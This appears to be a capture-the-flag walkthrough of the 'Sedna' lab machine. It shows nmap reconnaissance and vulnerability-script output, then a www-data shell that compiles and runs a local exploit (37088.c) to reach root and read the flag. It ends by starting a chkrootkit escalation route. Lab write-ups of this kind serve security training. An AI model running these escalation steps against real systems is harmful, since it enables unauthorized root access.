┌──(kali㉿kali)-[~/Downloads/Sedna] └─$ sudo nmap --min-rate 10000 -p- 192.168.56.144 [sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 05:57 EDT Nmap scan report for 192.168.56.144 Host is up (0.00059s latency). Not shown: 65523 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 993/tcp open imaps 995/tcp open pop3s 8080/tcp open http-proxy 37302/tcp open unknown MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC)
┌──(kali㉿kali)-[~/Downloads/Sedna] └─$ sudo nmap -sT -sV -sC -O -p22,53,80,110,111,139,143,445,993,995,8080,37302 192.168.56.144 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 06:01 EDT Nmap scan report for 192.168.56.144 Host is up (0.00060s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA) | 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA) | 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA) |_ 256 ca:36:3c:32:e6:24:f9:b7:b4:d4:1d:fc:c0:da:10:96 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-title: Site doesn\'t have a title (text/html). |_http-server-header: Apache/2.4.7 (Ubuntu) | http-robots.txt: 1 disallowed entry |_Hackers 110/tcp open pop3 Dovecot pop3d | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_pop3-capabilities: UIDL AUTH-RESP-CODE TOP STLS PIPELINING SASL CAPA RESP-CODES |_ssl-date: TLS randomness does not represent time 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 37302/tcp status | 100024 1 46167/tcp6 status | 100024 1 54981/udp6 status |_ 100024 1 58453/udp status 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd (Ubuntu) | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_imap-capabilities: more capabilities STARTTLS IDLE post-login LOGINDISABLEDA0001 LOGIN-REFERRALS Pre-login IMAP4rev1 listed SASL-IR OK ID LITERAL+ ENABLE have |_ssl-date: TLS randomness does not represent time 445/tcp open Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd (Ubuntu) |_imap-capabilities: capabilities IDLE more ENABLE post-login AUTH=PLAINA0001 Pre-login IMAP4rev1 listed SASL-IR OK ID LITERAL+ LOGIN-REFERRALS have | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3 Dovecot pop3d |_ssl-date: TLS randomness does not represent time |_pop3-capabilities: SASL(PLAIN) UIDL TOP AUTH-RESP-CODE PIPELINING USER CAPA RESP-CODES | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: |_ Potentially risky methods: PUT DELETE |_http-title: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-open-proxy: Proxy might be redirecting requests 37302/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿kali)-[~/Downloads/Sedna] └─$ sudo nmap --script=vuln -p22,53,80,110,111,139,143,445,993,995,8080,37302 192.168.56.144 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 06:02 EDT Nmap scan report for 192.168.56.144 Host is up (0.00038s latency).
PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /robots.txt: Robots file | /files/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' | /modules/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' | /system/: Potentially interesting folder |_ /themes/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 110/tcp open pop3 | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA | Modulus Type: Safe prime | Modulus Source: Unknown/Custom-generated | Modulus Length: 1024 | Generator Length: 8 | Public Key Length: 1024 | References: |_ https://weakdh.org | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the "POODLE" issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://www.securityfocus.com/bid/70574 | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.openssl.org/~bodo/ssl-poodle.pdf |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 111/tcp open rpcbind 139/tcp open netbios-ssn 143/tcp open imap | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the "POODLE" issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://www.securityfocus.com/bid/70574 | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.openssl.org/~bodo/ssl-poodle.pdf |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA | Modulus Type: Safe prime | Modulus Source: Unknown/Custom-generated | Modulus Length: 1024 | Generator Length: 8 | Public Key Length: 1024 | References: |_ https://weakdh.org 445/tcp open microsoft-ds 993/tcp open imaps | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA | Modulus Type: Safe prime | Modulus Source: Unknown/Custom-generated | Modulus Length: 1024 | Generator Length: 8 | Public Key Length: 1024 | References: |_ https://weakdh.org | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the "POODLE" issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://www.securityfocus.com/bid/70574 | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.openssl.org/~bodo/ssl-poodle.pdf |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 995/tcp open pop3s | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA | Modulus Type: Safe prime | Modulus Source: Unknown/Custom-generated | Modulus Length: 1024 | Generator Length: 8 | Public Key Length: 1024 | References: |_ https://weakdh.org | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the "POODLE" issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://www.securityfocus.com/bid/70574 | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.openssl.org/~bodo/ssl-poodle.pdf |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 8080/tcp open http-proxy | http-enum: | /examples/: Sample scripts | /manager/html/upload: Apache Tomcat (401 Unauthorized) | /manager/html: Apache Tomcat (401 Unauthorized) |_ /docs/: Potentially interesting folder | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server\'s resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 37302/tcp open unknown MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC)
Host script results: | smb-vuln-regsvc-dos: | VULNERABLE: | Service regsvc in Microsoft Windows systems vulnerable to denial of service | State: VULNERABLE | The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference | pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes | while working on smb-enum-sessions. |_ |_smb-vuln-ms10-061: false |_smb-vuln-ms10-054: false
www-data@Sedna:/tmp$ gcc 37088.c -o 37088 gcc 37088.c -o 37088 www-data@Sedna:/tmp$ ./37088 ./37088 created /var/crash/_bin_sleep.33.crash crasher: my pid is 4761 apport stopped, pid = 4762 getting pid 4761 current pid = 4760..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..2500.. ** child: current pid = 4761 ** child: executing /bin/su sleeping 2s..
checker: mode 4534 waiting for file to be unlinked..writing to fifo fifo written.. wait... waiting for /etc/sudoers.d/core to appear..
checker: new mode 32768 .. done checker: SIGCONT checker: writing core checker: done success sudo: unable to resolve host Sedna # whoami whoami root # id id uid=0(root) gid=0(root) groups=0(root) # cd /root cd /root # ls ls 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip chkrootkit flag.txt # cat flag.txt cat flag.txt a10828bee17db751de4b936614558305
chkrootkit 提权
上传 pspy 看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14
www-data@Sedna:/etc$ chkrootkit --version chkrootkit --version The program 'chkrootkit' is currently not installed. To run 'chkrootkit' please ask your administrator to install the package 'chkrootkit' www-data@Sedna:/etc$ cd chkrootkit cd chkrootkit www-data@Sedna:/etc/chkrootkit$ ls ls ACKNOWLEDGMENTS README.chklastlog chklastlog.c chkutmp.c COPYRIGHT README.chkwtmp chkproc.c chkwtmp.c Makefile check_wtmpx.c chkrootkit ifpromisc.c README chkdirs.c chkrootkit.lsm strings.c www-data@Sedna:/etc/chkrootkit$ ./chkrootkit -V ./chkrootkit -V chkrootkit version 0.49